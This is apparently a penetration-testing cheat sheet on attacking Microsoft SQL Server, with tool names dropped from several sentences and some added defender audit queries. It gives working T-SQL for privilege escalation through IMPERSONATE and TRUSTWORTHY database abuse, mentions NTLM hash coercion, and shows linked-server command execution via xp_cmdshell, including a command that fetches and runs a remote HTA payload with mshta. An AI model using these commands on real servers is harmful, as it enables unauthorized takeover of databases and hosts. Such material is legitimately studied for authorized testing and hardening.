Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft. By default, it listens on TCP port 1433.
Default MS-SQL System Tables:
master Database: Records all the system-level information for an instance of SQL Server.
msdb Database: Is used by SQL Server Agent for scheduling alerts and jobs.
model Database: Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
Resource Database: Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
tempdb Database: Is a workspace for holding temporary objects or intermediate result sets.
Practice
Enumerate
Using nmap scripts, we can enumerate the version of the TNS-Listener
To enumerate Databases, Tables, Columns, Users, Permissions, refers to the following page
Brute Force Credentials
If you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful: you can lock out accounts if you fail login several times using an existing username.
To locally execute/read/write files on an MSSQL instance, see the following page:
Coerced Auths (Stealing NTLM Hash)
On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. MSSQL uses Kerberos to authenticate users so we can retrieve the NTLM hash.
MSSQL Privilege Escalation
SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.
To enumerate users that you can impersonate, run the following queries:
-- Find users you can impersonate
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
-- Check if the user "sa" or any other high privileged user is mentioned
The same enumeration is available as a built-in command in mssqlclient.py:
SQL (dbo@ScrambleHR)> enum_impersonate
If you can impersonate a user, even if they aren't sysadmin, you should check whether that user has access to other databases or linked servers.
-- Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Note that once you are sysadmin you can impersonate any other one:
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the RegUser login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT
If a regular user is given the db_owner role over a database owned by an admin login (such as sa) and that database is configured as TRUSTWORTHY, that user can abuse these privileges to privesc, because stored procedures created in that database can execute as the owner (admin).
To enumerate, run the following queries:
-- Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
-- Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;
-- Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
If you find you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'
--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me
--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')
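As an added defender-side check (not part of the original page), the following T-SQL audit lists the two conditions the escalation above depends on: server-level IMPERSONATE grants, and TRUSTWORTHY databases owned by a sysadmin together with their db_owner members. `<trustworthy_db>` and `<low_privileged_login>` are placeholders; it assumes the reader runs it with sysadmin or VIEW SERVER STATE-level rights.

```sql
-- 1. Server-level IMPERSONATE grants: which login may become which login.
--    For class 101 (SERVER_PRINCIPAL) major_id is the login being impersonated.
SELECT grantee.name                              AS grantee_login,
       target.name                               AS impersonatable_login,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions    AS p
JOIN sys.server_principals     AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals     AS target  ON target.principal_id  = p.major_id
WHERE p.class = 101
  AND p.permission_name = 'IMPERSONATE'
  AND p.state IN ('G', 'W');   -- GRANT / GRANT WITH GRANT OPTION

-- 2. TRUSTWORTHY databases and whether their owner is sysadmin.
--    msdb is TRUSTWORTHY by design and is excluded from the listing.
SELECT d.name                                   AS database_name,
       SUSER_SNAME(d.owner_sid)                 AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb';

-- 3. db_owner members of one database returned by query 2 (run inside it).
-- USE <trustworthy_db>;
SELECT mp.name      AS database_user,
       mp.type_desc AS principal_type,
       sp.name      AS mapped_login
FROM sys.database_role_members  AS drm
JOIN sys.database_principals    AS rp ON rp.principal_id = drm.role_principal_id
JOIN sys.database_principals    AS mp ON mp.principal_id = drm.member_principal_id
LEFT JOIN sys.server_principals AS sp ON sp.sid = mp.sid
WHERE rp.name = 'db_owner';

-- Remediation, after review, as a sysadmin (placeholders in angle brackets):
-- ALTER DATABASE [<trustworthy_db>] SET TRUSTWORTHY OFF;
-- ALTER AUTHORIZATION ON DATABASE::[<trustworthy_db>] TO [<low_privileged_login>];
-- REVOKE IMPERSONATE ON LOGIN::[sa] FROM [<grantee_login>];
```

A database that is TRUSTWORTHY and owned by a non-sysadmin login no longer lets a db_owner reach sysadmin through EXECUTE AS OWNER, so the ALTER AUTHORIZATION alone closes this path even where TRUSTWORTHY must stay on.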
The account running the MSSQL service will have the SeImpersonatePrivilege token privilege enabled.
You will probably be able to escalate to Administrator or NT AUTHORITY\SYSTEM following this page:
We can also enumerate Linked Servers using the following SQL query on an MSSQL instance:
EXEC sp_linkedservers;
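As an added review query (not from the original page), this lists each linked server together with the login mapping it uses, so an administrator can spot links that map every local login to a single remote account and have RPC OUT enabled, which is what the remote execution below relies on. Column names are from sys.servers and sys.linked_logins; `<remote_low_priv_user>` is a placeholder.

```sql
-- Linked servers and their login mappings.
-- local_principal_id = 0 in sys.linked_logins means "all local logins".
SELECT s.name                         AS linked_server,
       s.data_source,
       s.provider,
       s.is_rpc_out_enabled,          -- needed for EXEC ... AT <server>
       s.is_data_access_enabled,      -- needed for OPENQUERY
       COALESCE(lp.name, '<all logins>') AS local_login,
       CASE WHEN ll.uses_self_credential = 1
            THEN '<caller''s own credentials>'
            ELSE ll.remote_name
       END                            AS remote_login
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Remediation examples (placeholders in angle brackets):
-- disable RPC OUT unless stored procedures really must be called across the link
-- EXEC sp_serveroption @server = '<linked_server>', @optname = 'rpc out', @optvalue = 'false';
-- replace a catch-all mapping with a low-privileged remote account
-- EXEC sp_addlinkedsrvlogin @rmtsrvname = '<linked_server>', @useself = 'false',
--      @locallogin = NULL, @rmtuser = '<remote_low_priv_user>', @rmtpassword = '<password>';
```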
Remote Execution
The SQL login on the Linked SQL Server must be sysadmin
# mssqlclient.py
mssqlclient.py -port 1433 <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>
SQL (dbo@master)> use_link <LINKED_SRV_NAME>
SQL >APPSRV01 (sa dbo@master)> enable_xp_cmdshell
SQL >APPSRV01 (sa dbo@master)> xp_cmdshell whoami
# MSSqlPwner
## Execution using stored procedures
mssqlpwner <DOMAIN>/<USER>:<PASSWORD>@<TARGET> -windows-auth exec whoami -link-name <LINKED_SRV_NAME>
## Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method
mssqlpwner <DOMAIN>/<USER>:<PASSWORD>@<TARGET> -windows-auth -link-name <LINKED_SRV_NAME> exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
Resources
Using , we may bruteforce MSSQL credentials.
Using from , we can login to an MSSQL instance.
Using we can connect to a MSSQL instance.
Tools like can be used to login to an MSSQL instance, and to perform SQL queries.
Tools like can be used to execute OS commands from MSSQL
can be used to execute remote commands through various methods.
Using from , we may be able to execute code.
From a UNIX-like host, using , we can enumerate for impersonation privileges and PrivEsc as follows
We may also use from to enumerate users that we can impersonate
Otherwise, we can use powershell script to automate the exploit
are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.
From a UNIX-like machine, we can enumerate Linked SQL Servers using or .
From a UNIX-like machine, we can execute code on a Linked SQL Server using or .